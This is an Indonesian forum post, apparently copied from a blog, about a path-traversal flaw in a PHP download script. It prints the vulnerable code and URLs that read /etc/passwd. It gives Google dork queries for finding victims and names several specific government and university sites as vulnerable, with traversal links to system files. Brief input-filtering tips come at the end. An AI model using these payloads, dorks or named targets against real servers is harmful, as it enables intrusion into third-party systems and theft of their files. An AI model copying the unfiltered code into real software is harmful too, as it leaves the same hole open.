Forum Komunitas

Forum bebas Buat Semua Kalangan
 
IndeksPortalCalendarFAQPencarianAnggotaGroupPendaftaranLogin
Login
Username:
Password:
Login otomatis: 
:: Lupa password?
SEO
CamelPark SEO tools - Google PageRank

Share | 
 

 KEsalahan Fatal Dalam Pemrograman

Go down 
PengirimMessage
Cahloegoe
PRAJURIT
PRAJURIT
avatar

Male
Jumlah posting : 22
Age : 29
Lokasi : Di Dunia Perantauan
Job/hobbies : Web Desaign
Registration date : 02.07.08

PostSubyek: KEsalahan Fatal Dalam Pemrograman   Fri Jul 04, 2008 7:49 pm

PHP adalah suatu bahasa pemrograman web yang cukup sakti yang kehandalannya tidak diragukan lagi. Tapi,adanya kesalahan dalam logika pemrograman php akan bisa berakibat fatal.
Salah satu contohnya adalah :
http://download.php
header( "Content-Type: application/octet-stream" );
header( "Content-Length: " . filesize($_GET['file'] ) );
header( "Content-Disposition: inline; filename=\"$_GET[file]\"");
readfile($_GET['file'] );
?>
Kode php diatas memiliki kelemahan yang fatal, dimana variabel “file” sama sekali tidak difilter, sehingga hacker akan bisa mendownload file apapun yang ada di server tersebut. Misalkan saja sang hacker mengakses alamat http://korban/download.php?file=../../../../../../etc/passwd maka file /etc/passwd milik server akan dikirimkan ke hacker.
Atau jika hacker mengakses alamat http://korban/download.php?file=download.php maka hacker akan mendapatkan source code dari file download.php.

Sedangkan untuk mencari korban bisa kita gunakan google, misalkan dengan syntax inurl:”download.php?file=” , atau inurl:”download.php?file=*.pdf” -intext:”download.php?file=*.pdf” atau yang lainnya.
Beberapa contoh situs yang vulnerable adalah:
http://www.mpbp.gov.my/download.php?file=download.php
http://elearning.mmu.edu.my/download...e=download.php
http://www.utem.edu.my/fkp/latihanIn.../../etc/passwd
http://www.moe.gov.my/pipp/download..../../etc/passwd

Adapun sedikit hal untuk pencegahan adalah:
1. lakukan pemfilteran terhadap inputan yang diterima dari user.
Misalkan pemfilteran terhadap karakter “../”, “%00”, atau type file yang boleh didownload.
2. lakukan pembatasan file access
3. berikan batasan, file di folder mana saja yang boleh didownload atau tidak
4. untuk menghindari googling, hindari penamaan script dengan nama “download.php” dan nama variabel dengan nama “file”.

gw comot dari wayan.web.id Laughing

Thanks
Kembali Ke Atas Go down
Lihat profil user http://www.cahloegoe.net46.net
 
KEsalahan Fatal Dalam Pemrograman
Kembali Ke Atas 
Halaman 1 dari 1
 Similar topics
-
» Vlad Dracula " Kisah Nyata Pembantai Umat Islam Dalam Perang Salib
» WTA >> cara pasang plat no di dalam windshield
» Tips Berguna di Kehidupan Sehari-hari
» IGO... seni menyerang, bertahan dan memperluas wilayah...
» MOHON BANTUANNYA DENGAN SANGAT!!!!!

Permissions in this forum:Anda tidak dapat menjawab topik
Forum Komunitas :: HOBBY :: Komputer :: Templates & Scripts-
Navigasi: